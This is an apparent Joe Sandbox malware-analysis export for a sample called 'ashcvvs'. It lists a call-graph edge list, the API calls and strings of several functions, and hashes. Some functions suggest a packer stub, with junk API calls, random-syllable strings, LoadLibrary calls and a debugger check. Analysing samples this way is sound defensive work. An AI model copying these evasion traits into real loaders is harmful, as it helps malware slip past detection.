4025fe __cftof2_l 6 API calls 7244->7246 7247 409b97 7245->7247 7248 409b89 7245->7248 7246->7249 
7251 402666 __cftof2_l 67 API calls 7247->7251 7254 409a5c 7248->7254 7249->7222 7252 409b91 7251->7252 7269 409bbb 7252->7269 7255 40809b __close_nolock 67 API calls 7254->7255 7258 409a6c 7255->7258 7256 409ac2 7272 408015 7256->7272 7258->7256 7260 40809b __close_nolock 67 API calls 7258->7260 7268 409aa0 7258->7268 7262 409a97 7260->7262 7261 40809b __close_nolock 67 API calls 7263 409aac CloseHandle 7261->7263 7266 40809b __close_nolock 67 API calls 7262->7266 7263->7256 7267 409ab8 GetLastError 7263->7267 7264 40268c __dosmaperr 67 API calls 7265 409aec 7264->7265 7265->7252 7266->7268 7267->7256 7268->7256 7268->7261 7281 4081b2 LeaveCriticalSection 7269->7281 7271 409bc3 7271->7249 7273 408081 7272->7273 7274 408026 7272->7274 7275 402666 __cftof2_l 67 API calls 7273->7275 7274->7273 7280 408051 7274->7280 7276 408086 7275->7276 7277 402679 __close 67 API calls 7276->7277 7278 408077 7277->7278 7278->7264 7278->7265 7279 408071 SetStdHandle 7279->7278 7280->7278 7280->7279 7281->7271 7282->7207 7673 423cd6 7676 423c94 7673->7676 7677 423cc0 7676->7677 7678 423ca7 7676->7678 7689 4247c5 7677->7689 7682 42471d 7678->7682 7681 423cb0 7683 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7682->7683 7684 424743 7683->7684 7696 425673 7684->7696 7686 42475b __ld12tod 7687 401006 __ftelli64_nolock 5 API calls 7686->7687 7688 4247c3 7687->7688 7688->7681 7690 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7689->7690 7691 4247eb 7690->7691 7692 425673 ___strgtold12_l 67 API calls 7691->7692 7693 424803 __ld12tod 7692->7693 7694 401006 __ftelli64_nolock 5 API calls 7693->7694 7695 42486b 7694->7695 7695->7681 7697 4256be 7696->7697 7703 4256dd 7696->7703 7698 402666 __cftof2_l 67 API calls 7697->7698 7699 4256c3 7698->7699 7700 4025fe __cftof2_l 6 API calls 7699->7700 7705 4256d3 7700->7705 7701 401006 __ftelli64_nolock 5 API calls 7702 425d38 7701->7702 7702->7686 7703->7705 7706 426acc 7703->7706 7705->7701 7707 426afe 7706->7707 7708 401006 __ftelli64_nolock 5 
API calls 7707->7708 7709 426c98 7708->7709 7709->7705 7710 404ed4 7711 404ee0 _flsall 7710->7711 7712 404ef8 7711->7712 7713 404fe2 _flsall 7711->7713 7714 4010ad ___free_lconv_mon 67 API calls 7711->7714 7715 404f06 7712->7715 7716 4010ad ___free_lconv_mon 67 API calls 7712->7716 7714->7712 7717 404f14 7715->7717 7719 4010ad ___free_lconv_mon 67 API calls 7715->7719 7716->7715 7718 404f22 7717->7718 7720 4010ad ___free_lconv_mon 67 API calls 7717->7720 7721 4010ad ___free_lconv_mon 67 API calls 7718->7721 7722 404f30 7718->7722 7719->7717 7720->7718 7721->7722 7723 404f3e 7722->7723 7724 4010ad ___free_lconv_mon 67 API calls 7722->7724 7725 404f4c 7723->7725 7727 4010ad ___free_lconv_mon 67 API calls 7723->7727 7724->7723 7726 404f5d 7725->7726 7728 4010ad ___free_lconv_mon 67 API calls 7725->7728 7729 40285b __lock 67 API calls 7726->7729 7727->7725 7728->7726 7730 404f65 7729->7730 7731 404f71 InterlockedDecrement 7730->7731 7732 404f8a 7730->7732 7731->7732 7733 404f7c 7731->7733 7746 404fee 7732->7746 7733->7732 7736 4010ad ___free_lconv_mon 67 API calls 7733->7736 7736->7732 7737 40285b __lock 67 API calls 7738 404f9e 7737->7738 7739 404fcf 7738->7739 7740 406575 ___removelocaleref 8 API calls 7738->7740 7749 404ffa 7739->7749 7744 404fb3 7740->7744 7743 4010ad ___free_lconv_mon 67 API calls 7743->7713 7744->7739 7745 40639d ___freetlocinfo 67 API calls 7744->7745 7745->7739 7752 402781 LeaveCriticalSection 7746->7752 7748 404f97 7748->7737 7753 402781 LeaveCriticalSection 7749->7753 7751 404fdc 7751->7743 7752->7748 7753->7751 7781 409294 RtlUnwind 7283 423b62 7284 423b6a __cfltcvt_init 7283->7284 7289 4246c7 GetModuleHandleA 7284->7289 7287 423b7f 7290 4246d6 GetProcAddress 7289->7290 7291 423b6f 7289->7291 7290->7291 7291->7287 7292 42465e 7291->7292 7297 424b7f 7292->7297 7294 424673 7295 424684 7294->7295 7296 4024d6 __invoke_watson 10 API calls 7294->7296 7295->7287 7296->7295 7299 424b9a __control87 7297->7299 7302 424bc3 __control87 7297->7302 7298 
402666 __cftof2_l 67 API calls 7300 424bb4 7298->7300 7299->7298 7301 4025fe __cftof2_l 6 API calls 7300->7301 7301->7302 7302->7294 7303 408d60 7304 40368a __amsg_exit 67 API calls 7303->7304 7305 408d67 7304->7305 7424 423d22 7427 423bf6 7424->7427 7428 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7427->7428 7429 423c0a 7428->7429 7754 404ce0 TlsAlloc 7430 404422 7431 40445e 7430->7431 7432 404434 7430->7432 7432->7431 7434 40730b 7432->7434 7435 407317 _flsall 7434->7435 7436 404eba __getptd 67 API calls 7435->7436 7437 40731c 7436->7437 7440 40946e 7437->7440 7441 40948d 7440->7441 7444 409494 7440->7444 7442 403992 __NMSG_WRITE 67 API calls 7441->7442 7442->7444 7452 4073aa 7444->7452 7446 4094a5 _memset 7448 40957d 7446->7448 7451 40953d SetUnhandledExceptionFilter UnhandledExceptionFilter 7446->7451 7449 403910 _raise 67 API calls 7448->7449 7450 409584 7449->7450 7451->7448 7453 404c6e __decode_pointer 6 API calls 7452->7453 7454 4073b5 7453->7454 7454->7446 7455 4073b7 7454->7455 7458 4073c3 _flsall 7455->7458 7456 40741f 7457 407400 7456->7457 7462 40742e 7456->7462 7461 404c6e __decode_pointer 6 API calls 7457->7461 7458->7456 7458->7457 7459 4073ea 7458->7459 7465 4073e6 7458->7465 7460 404e41 __getptd_noexit 67 API calls 7459->7460 7463 4073ef _siglookup 7460->7463 7461->7463 7464 402666 __cftof2_l 67 API calls 7462->7464 7467 407495 7463->7467 7469 403910 _raise 67 API calls 7463->7469 7475 4073f8 _flsall 7463->7475 7466 407433 7464->7466 7465->7459 7465->7462 7468 4025fe __cftof2_l 6 API calls 7466->7468 7470 40285b __lock 67 API calls 7467->7470 7471 4074a0 7467->7471 7468->7475 7469->7467 7470->7471 7472 404c65 _raise 6 API calls 7471->7472 7473 4074d5 7471->7473 7472->7473 7476 40752b 7473->7476 7475->7446 7477 407531 7476->7477 7478 407538 7476->7478 7480 402781 LeaveCriticalSection 7477->7480 7478->7475 7480->7478 7755 4018e2 7759 4018f3 7755->7759 7756 4018f9 7757 401889 101 API calls _write_multi_char 7757->7759 7758 402666 __cftof2_l 67 
API calls 7758->7759 7759->7756 7759->7757 7759->7758 7782 4041a3 7783 4041b0 7782->7783 7784 406728 __calloc_crt 67 API calls 7783->7784 7785 4041ca 7784->7785 7786 406728 __calloc_crt 67 API calls 7785->7786 7787 4041e3 7785->7787 7786->7787 7306 404464 SetUnhandledExceptionFilter 7481 40272a 7482 40273a 7481->7482 7483 40275e 7482->7483 7484 402746 DeleteCriticalSection 7482->7484 7486 402770 DeleteCriticalSection 7483->7486 7487 40277e 7483->7487 7485 4010ad ___free_lconv_mon 67 API calls 7484->7485 7485->7482 7486->7483 7488 40732f 7489 407332 7488->7489 7490 40946e _abort 69 API calls 7489->7490 7491 40733e _flsall 7490->7491 7788 4033b0 7789 4033e9 7788->7789 7790 4033dc 7788->7790 7792 401006 __ftelli64_nolock 5 API calls 7789->7792 7791 401006 __ftelli64_nolock 5 API calls 7790->7791 7791->7789 7798 4033f9 __except_handler4 __IsNonwritableInCurrentImage 7792->7798 7793 40347c 7794 403452 __except_handler4 7794->7793 7795 40346c 7794->7795 7796 401006 __ftelli64_nolock 5 API calls 7794->7796 7797 401006 __ftelli64_nolock 5 API calls 7795->7797 7796->7795 7797->7793 7798->7793 7798->7794 7804 40704a RtlUnwind 7798->7804 7800 4034cb __except_handler4 7801 4034ff 7800->7801 7802 401006 __ftelli64_nolock 5 API calls 7800->7802 7803 401006 __ftelli64_nolock 5 API calls 7801->7803 7802->7801 7803->7794 7804->7800 7760 4097f7 7761 409810 7760->7761 7762 409808 7760->7762 7764 409822 7761->7764 7765 40981f CloseHandle 7761->7765 7762->7761 7763 40980d CloseHandle 7762->7763 7763->7761 7765->7764 7809 406fb8 7810 406fca 7809->7810 7812 406fd8 @_EH4_CallFilterFunc@8 7809->7812 7811 401006 __ftelli64_nolock 5 API calls 7810->7811 7811->7812 7492 42463b 7495 4245b3 7492->7495 7494 424659 7496 4245c0 7495->7496 7497 42461f 7495->7497 7496->7497 7499 4245c5 7496->7499 7553 423ea4 7497->7553 7500 4245e3 7499->7500 7501 4245ca 7499->7501 7502 424606 7500->7502 7504 4245ed 7500->7504 7509 4243fe 7501->7509 7540 423f94 7502->7540 7523 4244b9 7504->7523 7508 424604 7508->7494 
7567 4249e9 7509->7567 7512 424438 7513 402666 __cftof2_l 67 API calls 7512->7513 7515 42443d 7513->7515 7514 424457 7577 42486d 7514->7577 7516 4025fe __cftof2_l 6 API calls 7515->7516 7518 424449 7516->7518 7520 401006 __ftelli64_nolock 5 API calls 7518->7520 7522 4244b7 7520->7522 7522->7494 7524 4249e9 __fltout2 67 API calls 7523->7524 7525 4244ea 7524->7525 7526 4244f3 7525->7526 7528 424515 7525->7528 7527 402666 __cftof2_l 67 API calls 7526->7527 7529 4244f8 7527->7529 7531 42486d __fptostr 67 API calls 7528->7531 7530 4025fe __cftof2_l 6 API calls 7529->7530 7538 424504 7530->7538 7532 424541 7531->7532 7534 424588 7532->7534 7536 424560 7532->7536 7532->7538 7533 401006 __ftelli64_nolock 5 API calls 7535 4245b1 7533->7535 7621 423d35 7534->7621 7535->7508 7539 424307 __cftof2_l 77 API calls 7536->7539 7538->7533 7539->7538 7541 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7540->7541 7542 423fb9 7541->7542 7543 423fc8 7542->7543 7544 423ff8 7542->7544 7545 402666 __cftof2_l 67 API calls 7543->7545 7546 424006 7544->7546 7550 42400f 7544->7550 7547 423fcd 7545->7547 7548 402666 __cftof2_l 67 API calls 7546->7548 7549 4025fe __cftof2_l 6 API calls 7547->7549 7548->7547 7552 423fdc _memset __alldvrm __cftoa_l _strrchr 7549->7552 7550->7552 7640 423f74 7550->7640 7552->7508 7554 4249e9 __fltout2 67 API calls 7553->7554 7555 423ed5 7554->7555 7556 423ede 7555->7556 7558 423efd 7555->7558 7557 402666 __cftof2_l 67 API calls 7556->7557 7559 423ee3 7557->7559 7561 42486d __fptostr 67 API calls 7558->7561 7560 4025fe __cftof2_l 6 API calls 7559->7560 7566 423eef 7560->7566 7562 423f41 7561->7562 7565 423d35 __cftoe2_l 77 API calls 7562->7565 7562->7566 7563 401006 __ftelli64_nolock 5 API calls 7564 423f72 7563->7564 7564->7508 7565->7566 7566->7563 7568 424a14 ___dtold 7567->7568 7603 425d6b 7568->7603 7571 407817 _strcpy_s 67 API calls 7572 424a4f 7571->7572 7573 4024d6 __invoke_watson 10 API calls 7572->7573 7576 424a62 7572->7576 7573->7576 7574 401006 
__ftelli64_nolock 5 API calls 7575 42442f 7574->7575 7575->7512 7575->7514 7576->7574 7578 4248a2 7577->7578 7579 424884 7577->7579 7578->7579 7581 4248a7 7578->7581 7580 402666 __cftof2_l 67 API calls 7579->7580 7582 424889 7580->7582 7584 4248bc 7581->7584 7587 4248ca _strlen 7581->7587 7583 4025fe __cftof2_l 6 API calls 7582->7583 7586 42448a 7583->7586 7585 402666 __cftof2_l 67 API calls 7584->7585 7585->7582 7586->7518 7589 424307 7586->7589 7587->7586 7588 406bc0 __shift __VEC_memcpy 7587->7588 7588->7586 7590 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7589->7590 7591 424325 7590->7591 7592 424329 7591->7592 7593 42435c 7591->7593 7594 402666 __cftof2_l 67 API calls 7592->7594 7597 424398 7593->7597 7617 423cf0 7593->7617 7595 42432e 7594->7595 7596 4025fe __cftof2_l 6 API calls 7595->7596 7602 42433f _memset 7596->7602 7599 423cf0 __shift __VEC_memcpy 7597->7599 7597->7602 7600 4243ad 7599->7600 7601 423cf0 __shift __VEC_memcpy 7600->7601 7600->7602 7601->7602 7602->7518 7606 425de1 7603->7606 7604 425e4e 7608 407817 _strcpy_s 67 API calls 7604->7608 7605 401006 __ftelli64_nolock 5 API calls 7607 424a2f 7605->7607 7606->7604 7609 425e66 7606->7609 7616 425dfe 7606->7616 7607->7571 7610 425eb1 7608->7610 7611 407817 _strcpy_s 67 API calls 7609->7611 7612 4024d6 __invoke_watson 10 API calls 7610->7612 7610->7616 7613 425e85 7611->7613 7612->7616 7614 4024d6 __invoke_watson 10 API calls 7613->7614 7613->7616 7614->7616 7615 426663 7616->7605 7616->7615 7618 423cf9 _strlen 7617->7618 7619 423d0a 7617->7619 7620 406bc0 __shift __VEC_memcpy 7618->7620 7619->7597 7620->7619 7622 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7621->7622 7623 423d4d 7622->7623 7624 423d53 7623->7624 7625 423d83 7623->7625 7626 402666 __cftof2_l 67 API calls 7624->7626 7628 423da0 7625->7628 7629 423d97 7625->7629 7627 423d58 7626->7627 7630 4025fe __cftof2_l 6 API calls 7627->7630 7633 423cf0 __shift __VEC_memcpy 7628->7633 7634 423dc4 7628->7634 7631 402666 __cftof2_l 67 API 
calls 7629->7631 7632 423d67 7630->7632 7631->7627 7632->7538 7633->7634 7635 407817 _strcpy_s 67 API calls 7634->7635 7636 423e1b 7635->7636 7637 4024d6 __invoke_watson 10 API calls 7636->7637 7638 423e2e 7636->7638 7637->7638 7638->7632 7639 406bc0 __shift __VEC_memcpy 7638->7639 7639->7632 7641 423ea4 __cftoe_l 77 API calls 7640->7641 7642 423f8f 7641->7642 7642->7552 7643 40153b 7646 404473 7643->7646 7647 404e41 __getptd_noexit 67 API calls 7646->7647 7648 40154c 7647->7648 7813 4018bc 7814 4018c6 7813->7814 7815 4018df 7814->7815 7817 401889 7814->7817 7818 40188f 7817->7818 7819 40189a 7818->7819 7820 40169e __flsbuf 101 API calls 7818->7820 7819->7814 7820->7819

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph for the function at 42379f-423aef: basic-block edge listing omitted (rendered interactively in the original report); the blocks call the APIs listed below.
                            APIs
                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423821
                            • DeleteVolumeMountPointW.KERNEL32(00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423828
                            • GetCommandLineA.KERNEL32(?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 0042382E
                            • lstrcatW.KERNEL32(?,00000000), ref: 00423853
                            • InterlockedExchange.KERNEL32(?,00000000), ref: 0042385F
                            • GetActiveWindow.USER32 ref: 00423865
                            • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 00423874
                            • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 0042388A
                            • IntersectRect.USER32(?,?,00000000), ref: 0042389B
                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 004238A4
                            • GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 004238B4
                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 004238BB
                            • GetCurrentConsoleFont.KERNEL32(00000000,00000000,?,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 004238C8
                            • SearchPathA.KERNEL32(Yihoses worowopep,Jaxukutoceh jozewo,Duhadakafu wofelewubogo xamuludemuhi gurujocakujuw,00000000,?,?,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 004238EB
                            • _memset.LIBCMT ref: 004238FD
                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0042390C
                            • DebugBreak.KERNEL32 ref: 00423912
                            • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0042391B
                            • LoadLibraryA.KERNEL32(00000000), ref: 00423931
                            • LoadLibraryA.KERNEL32(emuritowuwep), ref: 00423938
                              • Part of subcall function 00401302: __wcstoi64.LIBCMT ref: 0040130E
                            • SetCommMask.KERNELBASE(00000000,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 0042394C
                            • GetTickCount.KERNEL32 ref: 00423952
                            • GetSystemTimes.KERNEL32(?,?,?,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423967
                            • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000001,?,00423AF5,00401523,00400000), ref: 0042398D
                            • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 004239AF
                            • HeapLock.KERNEL32(00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 004239B6
                            • FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000), ref: 004239CA
                            • _printf.LIBCMT ref: 004239E7
                            • _malloc.LIBCMT ref: 004239ED
                            • __vswprintf.LIBCMT ref: 00423A03
                            • _calloc.LIBCMT ref: 00423A10
                            • _printf.LIBCMT ref: 00423A1C
                            • _calloc.LIBCMT ref: 00423A28
                            • _fgetpos.LIBCMT ref: 00423A32
                            • _calloc.LIBCMT ref: 00423A39
                            • GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423A48
                            • LoadLibraryA.KERNEL32(msimg32.dll,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423A8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: LibraryLoad_calloc$AtomCommConsoleDeleteGlobalSystem_printf$ActiveAllocBreakCacheCommandConfigCountCurrentDateDebugDefaultDirectoryDriveEnumExchangeFlushFoldFontFormatFormatsHeapInstructionInterlockedIntersectLineLockLogicalMaskMessageMountNameOpenPathPointRectSearchStringStringsTickTimerTimesVolumeWaitableWindowWindowsWrite__vswprintf__wcstoi64_fgetpos_malloc_memsetlstrcat
                            • String ID: %s %c$%s %f %c$0 %f$Duhadakafu wofelewubogo xamuludemuhi gurujocakujuw$Jaxukutoceh jozewo$Pev$Yihoses worowopep$emuritowuwep$k`$msimg32.dll$}$
                            • API String ID: 1820217008-732333065
                            • Opcode ID: a1ab79323c1a95ccc9c26174e22bfe311174686985f8be92119be2d411ed885f
                            • Instruction ID: 8dbc5d9f7ccbc57e8f3c20c9d260084f9863f046cce8ff7655e10ccfc7c1cc5d
                            • Opcode Fuzzy Hash: a1ab79323c1a95ccc9c26174e22bfe311174686985f8be92119be2d411ed885f
                            • Instruction Fuzzy Hash: B8819072606130AFC721AF61EC49C9F7BACEF4A355B80443AF585D2161DB3C4646CBAE

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                            • String ID:
                            • API String ID: 2477803136-0
                            • Opcode ID: eb119a3c39fd4835dba04421693814566908bcf32f3bfbb0ef04930a60541643
                            • Instruction ID: 8e62b3500c5768de0fb0972e9e30bc58fc2e5440a680f1adf78b159871465520
                            • Opcode Fuzzy Hash: eb119a3c39fd4835dba04421693814566908bcf32f3bfbb0ef04930a60541643
                            • Instruction Fuzzy Hash: 312197B0900305A9DB247FB2A886B6E2668AF4075DF10493FF9057A1E2EB7C89409B5D

                            Control-flow Graph

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004026C4
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 3d5f5e671e91ae1df486ff181aba876469fa193ecfa479a68fe214cac1e65b00
                            • Instruction ID: ee0cfddc00ff7ee0933909f523ceabc00ff2598ea9691a22b50d1bb8cd8728f6
                            • Opcode Fuzzy Hash: 3d5f5e671e91ae1df486ff181aba876469fa193ecfa479a68fe214cac1e65b00
                            • Instruction Fuzzy Hash: DFD05E32A543089BDB105F706C0A7623BECD3847A5F544436B90DC6690E6B4D9918588

                            Control-flow Graph

                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00401653
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401668
                            • UnhandledExceptionFilter.KERNEL32(004271E0), ref: 00401673
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0040168F
                            • TerminateProcess.KERNEL32(00000000), ref: 00401696
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: d5fe470e44ce5f7f528ad9339df5a5f2f4c585a15928b08a25921d4a2a5a6b09
                            • Instruction ID: 824123d5e3cd5fba26b156f8f396cb5c9432919fc78e99a8dc8de2703bcac8e4
                            • Opcode Fuzzy Hash: d5fe470e44ce5f7f528ad9339df5a5f2f4c585a15928b08a25921d4a2a5a6b09
                            • Instruction Fuzzy Hash: 5B21C0786042089FC720DF26FD45A443BA0FB08315FD0447AE90897BB4EBB569868F8D

                            Control-flow Graph

                            APIs
                            • GetNumaHighestNodeNumber.KERNEL32(00000000,00000000,?), ref: 00423665
                            • GetNumaHighestNodeNumber.KERNEL32(00000000,?,00000000,?), ref: 004236A3
                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,Cogi), ref: 004236AD
                            • OpenJobObjectA.KERNEL32(00000000,00000000,Rodohuvoboco jalajo sezafowebazobe dolarocuviveg), ref: 004236BA
                            • GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004236C9
                            • Sleep.KERNEL32(00000000), ref: 004236D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: HighestNodeNumaNumber$CalendarInfoNameObjectOpenPathShortSleep
                            • String ID: -$Cogi$Rodohuvoboco jalajo sezafowebazobe dolarocuviveg
                            • API String ID: 2970987874-389815433
                            • Opcode ID: 5c364feddc24ff39079a9ff57fbb3d21603279bb8c3fb89d7a7422fafd61c146
                            • Instruction ID: deacb889439696245f735b3f4471453babfeec7347a63c5168fd63d97d027ef3
                            • Opcode Fuzzy Hash: 5c364feddc24ff39079a9ff57fbb3d21603279bb8c3fb89d7a7422fafd61c146
                            • Instruction Fuzzy Hash: 7921A771A00128EBC7319F15EC859AE7778EB85715F4080ADE659A7241C73C4A86CF6C

                            Control-flow Graph

                            APIs
                            • GetFullPathNameW.KERNEL32(gumumateseyewemisisapef,00000000,?,00000000,00000000,00000000,00000001), ref: 00423744
                            • FreeEnvironmentStringsW.KERNEL32(00000000,00000000,00000001), ref: 00423760
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000000,00000001), ref: 0042377E
                            • SetFileShortNameA.KERNEL32(00000000,ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi), ref: 0042378A
                            Strings
                            • gumumateseyewemisisapef, xrefs: 0042373F
                            • ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi, xrefs: 00423784
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
                            • String ID: gumumateseyewemisisapef$ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi
                            • API String ID: 4071102102-3457428971
                            • Opcode ID: 4118aea02ff7cce9f021c469c9c8a939c1348656a373ad51a8f1151b96d27343
                            • Instruction ID: 4f65d5ff727ea9b5f32b9490f161a63e31010cc474a4420f8d895bd29f22500d
                            • Opcode Fuzzy Hash: 4118aea02ff7cce9f021c469c9c8a939c1348656a373ad51a8f1151b96d27343
                            • Instruction Fuzzy Hash: B101B1B1704124AFCB20AF69BC89D6B77BCE78971AB80503FF501D2150DA3C1945CB6E

                            Control-flow Graph

                            APIs
                            • __getptd.LIBCMT ref: 00405EEC
                              • Part of subcall function 00404EBA: __getptd_noexit.LIBCMT ref: 00404EBD
                              • Part of subcall function 00404EBA: __amsg_exit.LIBCMT ref: 00404ECA
                            • __amsg_exit.LIBCMT ref: 00405F0C
                            • __lock.LIBCMT ref: 00405F1C
                            • InterlockedDecrement.KERNEL32(?), ref: 00405F39
                            • InterlockedIncrement.KERNEL32(021B17F0), ref: 00405F64
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
